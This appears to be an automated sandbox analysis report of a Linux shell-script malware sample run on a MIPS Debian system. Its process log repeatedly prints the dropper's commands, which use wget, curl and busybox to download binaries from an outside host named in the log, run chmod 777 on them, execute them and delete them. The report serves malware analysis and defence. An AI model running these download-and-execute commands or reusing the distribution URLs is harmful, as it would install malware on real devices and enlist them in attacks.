Analysis Overview
SHA256
2e2b3ce541f65d397202c55134a2322f97b77030ad26f52489c8a65e1fffa017
Threat Level: Shows suspicious behavior
The file 0766721821c3e4418c33ba73125add0a.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 01:00
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 01:00
Reported
2024-11-21 01:03
Platform
debian9-mipsel-20240226-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | N/A |
| N/A | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | N/A |
| N/A | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | N/A |
| N/A | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | N/A |
| N/A | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | N/A |
| N/A | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | N/A |
| N/A | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | N/A |
| N/A | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | N/A |
| N/A | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | N/A |
| N/A | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | N/A |
| N/A | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | N/A |
| N/A | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | N/A |
| N/A | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | N/A |
| N/A | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | N/A |
| N/A | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | N/A |
| N/A | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | N/A |
| N/A | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | N/A |
| N/A | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | N/A |
| N/A | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | N/A |
| N/A | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | N/A |
| N/A | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | N/A |
| N/A | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | N/A |
| N/A | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | N/A |
| N/A | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | N/A |
| N/A | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | N/A |
| N/A | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | N/A |
| N/A | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | N/A |
| N/A | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | /usr/bin/curl | N/A |
Processes
/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh
[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/chmod
[chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
[./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/rm
[rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/chmod
[chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
[./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/rm
[rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/chmod
[chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
[./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/rm
[rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/chmod
[chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
[./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/rm
[rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/chmod
[chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
[./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/rm
[rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/chmod
[chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
[./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/rm
[rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/chmod
[chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
[./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/rm
[rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/chmod
[chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
[./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/rm
[rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/chmod
[chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
[./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/rm
[rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/chmod
[chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
[./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/rm
[rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/chmod
[chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
[./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/rm
[rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/chmod
[chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
[./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/rm
[rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/chmod
[chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
[./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/rm
[rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/chmod
[chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
[./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/rm
[rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/chmod
[chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
[./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/rm
[rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/chmod
[chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
[./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/rm
[rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/chmod
[chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
[./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/rm
[rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/chmod
[chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
[./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/rm
[rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/chmod
[chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
[./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/rm
[rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/usr/bin/curl
